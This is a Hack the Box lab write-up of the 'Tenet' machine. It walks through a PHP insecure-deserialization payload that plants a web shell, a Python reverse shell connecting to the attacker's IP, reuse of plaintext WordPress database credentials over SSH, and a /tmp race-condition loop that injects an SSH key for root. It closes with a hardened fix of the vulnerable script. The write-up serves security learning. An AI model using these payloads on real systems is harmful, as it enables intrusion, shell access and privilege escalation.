HTB Tenet - lmiyasato/lenny-hacking GitHub Wiki

Hack the Box - Tenet

This is my first writeup using markdown so bear with me. The Tenet box is a medium difficulty rated box which involves an Apache web server, WordPress, a careful review of PHP source code and SSH key exploitation.

Skills used

  • Enumeration
  • PHP
  • Bash
  • SSH keys

Lessons Learned

  • Insecure deserialization
  • Exploitation of a race condition in a bash script

Enumeration / Reconnaissance

Nmap

Begin with an nmap scan of all TCP ports.

kali@kali:~/Documents/HTB/tenet$ nmap -p- -n -Pn 10.10.10.223 -v 

Nmap scan report for 10.10.10.223
Host is up (0.16s latency).
Not shown: 65306 closed ports, 227 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open 

Browsing to port 80 gives the Apache2 Ubuntu default page.

Run gobuster against the site to enumerate directories and pages:

kali@kali:~/Documents/HTB/tenet$ gobuster dir -u http://10.10.10.223 -w /usr/share/wordlists/dirb/common.txt


Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url:                     http://10.10.10.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s

/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 10918]
/server-status        (Status: 403) [Size: 277]  
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.223/wordpress/]
2021/06/16 23:38:43 Finished

Then add tenet.htb to the /etc/hosts file.

Click on the Migration blog entry; its comments contain something interesting.

In the comments Neil complains about sator.php and its backup file not having been removed yet. This gives us a clue:

Now visit http://10.10.10.223/sator.php, which prints the following:

[+] Grabbing users from text file
[] Database updated

Now visit http://10.10.10.223/sator.php.bak, which returns the PHP source:

<?php
class DatabaseExport
{
    public $user_file = 'users.txt';
    public $data = '';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this->data = 'Success';
    }

    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
        echo '[] Database updated <br>';
        //  echo 'Gotta get this working properly...';
    }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);
$app = new DatabaseExport;
$app->update_db();
?>

The DatabaseExport class above has a __destruct() method that writes $data into the file named by $user_file (users.txt by default). The arepo GET parameter is passed straight to unserialize(), so whoever controls that parameter controls both properties of the object that gets destructed: the file name and the content written to it. That is the insecure deserialization.

Add the following to a file named generate.php:

<?php
class DatabaseExport
{
    public $user_file = 'attack.php';
    public $data = '<?php system($_GET["cmd"]);?>';
}
$payload = new DatabaseExport;
echo serialize($payload);
?>

Run the following command:

kali@kali:~/Documents/HTB/tenet$ php generate.php 

O:14:"DatabaseExport":2:{s:9:"user_file";s:10:"attack.php";s:4:"data";s:29:"<?php system($_GET["cmd"]);?>";}

Then pass the payload above as the arepo parameter, with the quotes and angle brackets URL-encoded:

http://10.10.10.223/sator.php?arepo=O:14:%22DatabaseExport%22:2:{s:9:%22user_file%22;s:10:%22attack.php%22;s:4:%22data%22;s:29:%22%3C?php%20system($_GET[%22cmd%22]);?%3E%22;}

Then you will receive the following:

[+] Grabbing users from text file
[] Database updated
[] Database updated 

Now you have command execution as www-data (output trimmed for brevity):

kali@kali:~/Documents/HTB/tenet$ wget -O - http://10.10.10.223/attack.php?cmd=id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check whether python3 is available:

kali@kali:~/Documents/HTB/tenet$ wget -O - http://10.10.10.223/attack.php?cmd=which%20python3
    /usr/bin/python3

It is, so use it to get a reverse shell and a foothold. Start a netcat listener:

kali@kali:~/Documents/HTB/tenet$ nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

Send the payload (replace the IP address with your own):

http://10.10.10.223/attack.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.52",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Catch the shell:

kali@kali:~/Documents/HTB/tenet$ nc -nvlp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.223.
Ncat: Connection from 10.10.10.223:11900.
bash: cannot set terminal process group (1533): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tenet:/var/www/html$ 

Privilege Escalation to Neil

WordPress keeps its database credentials in plaintext in wp-config.php, and those passwords are frequently reused for other accounts, so that is the first place to look:

www-data@tenet:/var/www/html$ cat /var/www/html/wordpress/wp-config.php

Output trimmed for brevity; the username and password are in the config file:

/** MySQL database username */
define( 'DB_USER', 'neil' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );

Since SSH is open, try these credentials against it:

kali@kali:~/Documents/HTB/tenet$ ssh neil@10.10.10.223

neil@tenet:~$ id
uid=1001(neil) gid=1001(neil) groups=1001(neil)

Privilege Escalation to Root

Check sudo -l, which shows the following:

neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User neil may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh

So the privilege escalation path goes through enableSSH.sh.

This part of the script creates the race condition: mktemp -u only picks a name without creating the file, touch then creates it under umask 110 (so it is world-writable), and there is a window before the file is appended to /root/.ssh/authorized_keys. All you need to do is sneak your own public key into /tmp/ssh-XXXXXXXX during that window.

addKey() {
   tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)   # -u: only generates a name, does not create the file
   (umask 110; touch $tmpName)              # file is created world-writable (0666)
   /bin/echo $key >>$tmpName
   checkFile $tmpName
   /bin/cat $tmpName >>/root/.ssh/authorized_keys   # whatever is in the file by now goes to root
   /bin/rm $tmpName
}

Generate an SSH key pair, then use the following loop to keep writing your public key into any /tmp/ssh-* file that appears:

while true; do echo "ssh-rsa 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 kali@kali" | tee /tmp/ssh* > /dev/null;done

Open another SSH session as neil and run the script:

neil@tenet:~$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!

With the loop running (it runs endlessly), keep trying to log in as root with your private key; it will eventually succeed.

kali@kali:~/Documents/HTB/tenet$ ssh -i id_rsa root@10.10.10.223
root@tenet:~# id
uid=0(root) gid=0(root) groups=0(root)
root@tenet:~#
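For contrast, here is how the addKey() step from enableSSH.sh should have been written so that the race does not exist. This is an added example, not the box's script: mktemp creates the temp file itself, atomically and with mode 0600, inside a private directory, so there is never a world-writable file for another user to write into; the authorized_keys path is a parameter so the function can be exercised against a scratch file.

```shell
#!/bin/sh
# Hardened rewrite of the addKey() step from enableSSH.sh (an added example,
# not the script from the box). Versus the vulnerable version: mktemp is
# called WITHOUT -u, so it creates the file itself, atomically, with mode
# 0600 (no touch, no umask 110 leaving it 0666, and no window in which another
# user can write to a name they can guess); the file lives in a private 0700
# directory rather than directly in /tmp; and the key line is validated before
# anything is appended to authorized_keys.
# Arguments: $1 = public key line, $2 = authorized_keys file to append to
# (a parameter so the function can be exercised against a scratch file).
addKeySafe() {
    local key authfile tmpdir tmpName nl re
    key=$1
    authfile=$2
    nl=$(printf '\nx'); nl=${nl%x}
    re='^(ssh-(rsa|ed25519)|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+=*( .*)?$'

    # A newline would smuggle a second key past a single-line check.
    case $key in
        *"$nl"*) echo "Rejected key: contains a newline" >&2; return 1 ;;
    esac
    if ! printf '%s\n' "$key" | grep -Eq "$re"; then
        echo "Rejected key: not an OpenSSH public key line" >&2
        return 1
    fi

    # Private directory and file, both created atomically by mktemp itself.
    tmpdir=$(mktemp -d) || return 1
    tmpName=$(mktemp "$tmpdir/ssh-XXXXXXXX") || { rm -rf "$tmpdir"; return 1; }

    printf '%s\n' "$key" > "$tmpName"
    # What gets appended is exactly what we wrote: nobody else could open the
    # file, let alone replace its contents, between the write and the append.
    cat "$tmpName" >> "$authfile"
    rm -rf "$tmpdir"
    echo "Successfully added key to $authfile"
}

# Demo against a scratch file using a constructed (not real) key.
demo=$(mktemp)
addKeySafe "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYEXAMPLEKEYEXAMPLEKEY demo@example" "$demo"
cat "$demo"
rm -f "$demo"
```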